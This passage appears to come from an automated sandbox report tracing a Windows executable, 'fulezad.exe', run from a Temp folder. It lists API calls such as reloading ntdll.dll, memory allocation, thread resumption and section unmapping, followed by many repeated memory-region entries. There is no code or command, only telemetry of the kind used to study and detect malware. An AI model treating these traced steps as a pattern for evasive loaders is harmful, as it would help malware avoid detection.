[239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0100.696] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x1809a0 | out: Wow64Process=0x1809a0) returned 1 [0100.699] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0100.699] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0100.699] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000 [0100.700] ReadFile (in: hFile=0x5c, lpBuffer=0x1d40000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808c4, lpOverlapped=0x0 | out: lpBuffer=0x1d40000*, lpNumberOfBytesRead=0x1808c4*=0x13b740, lpOverlapped=0x0) returned 1 [0100.705] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1e80000 [0100.713] CloseHandle (hObject=0x5c) returned 1 [0100.713] VirtualFree (lpAddress=0x1d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.718] VirtualFree (lpAddress=0x1e80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.724] NtResumeThread (in: ThreadHandle=0x54, SuspendCount=0x1809a4 | out: SuspendCount=0x1809a4*=0x1) returned 0x0 [0101.521] CloseHandle (hObject=0x58) returned 1 [0101.521] CloseHandle (hObject=0x54) returned 1 [0101.521] CloseHandle (hObject=0x60) returned 1 [0101.521] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180994 | out: Wow64Process=0x180994) returned 1 [0101.523] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60 [0101.524] GetFileSize (in: hFile=0x60, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0101.524] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000 [0101.524] ReadFile (in: hFile=0x60, lpBuffer=0x1d40000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808cc, lpOverlapped=0x0 | out: lpBuffer=0x1d40000*, lpNumberOfBytesRead=0x1808cc*=0x13b740, lpOverlapped=0x0) returned 1 [0101.529] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1e80000 [0101.583] CloseHandle (hObject=0x60) returned 1 [0101.583] VirtualFree (lpAddress=0x1d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.588] VirtualFree (lpAddress=0x1e80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.592] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x350000) returned 0x0 [0101.594] ExitProcess (uExitCode=0x0) Process: id = "5" image_name = "fulezad.exe" filename = "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe" page_root = "0x2f17d000" os_pid = "0x8bc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x8e4" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1191 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1192 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1193 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1194 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1195 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1196 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1197 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1198 start_va = 0x400000 end_va = 0x479fff entry_point = 0x400000 region_type = mapped_file name = "fulezad.exe" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe") Region: id = 1199 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1200 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1201 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1202 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1203 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1204 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1205 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1206 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1207 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1214 start_va = 0x400000 end_va = 0x42afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1222 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1223 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1224 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1225 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1226 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1227 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1228 start_va = 0x370000 end_va = 0x3d6fff entry_point = 0x370000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1229 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1230 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1231 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1232 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 1233 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1234 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1235 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1236 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1237 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1238 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1239 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1240 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1241 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1242 start_va = 0x76160000 end_va = 0x762bbfff entry_point = 0x76160000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1245 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1246 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1247 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1248 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1249 start_va = 0x1b0000 end_va = 0x1cdfff entry_point = 0x1b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1250 start_va = 0x430000 end_va = 0x5b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1251 start_va = 0x1b0000 end_va = 0x1cdfff entry_point = 0x1b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1252 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1253 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1254 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1255 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1256 start_va = 0x5c0000 end_va = 0x740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1257 start_va = 0x750000 end_va = 0x1b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 1258 start_va = 0x752d0000 end_va = 0x752dcfff entry_point = 0x752d0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 1259 start_va = 0x76770000 end_va = 0x773b9fff entry_point = 0x76770000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1260 start_va = 0x75660000 end_va = 0x756b6fff entry_point = 0x75660000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1261 start_va = 0x1b50000 end_va = 0x1b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 1262 start_va = 0x1b90000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 1263 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1264 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1265 start_va = 0x1c90000 end_va = 0x209ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c90000" filename = "" Region: id = 1266 start_va = 0x20a0000 end_va = 0x24affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1267 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1268 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1269 start_va = 0x1c90000 end_va = 0x1f5efff entry_point = 0x1c90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1270 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1271 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1272 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1273 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1274 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1275 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1276 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1277 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1278 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1279 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1280 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1281 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1282 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1283 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1284 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1285 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1286 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1287 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1288 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1289 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1290 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1291 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1292 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1293 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1294 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1295 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1296 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1297 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1298 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1299 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1300 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1301 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1302 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1303 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1304 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1305 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1306 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1307 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1308 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1309 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1310 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1311 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1312 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1313 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1314 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1315 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1316 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1317 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1318 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1319 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1320 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1321 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1322 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1323 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1324 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1325 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1326 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1327 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1328 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1329 start_va = 0x1f60000 end_va = 0x236ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Region: id = 1330 start_va = 0x2370000 end_va = 0x277ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 1331 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1332 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1333 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1334 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1335 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1336 start_va = 0x250000 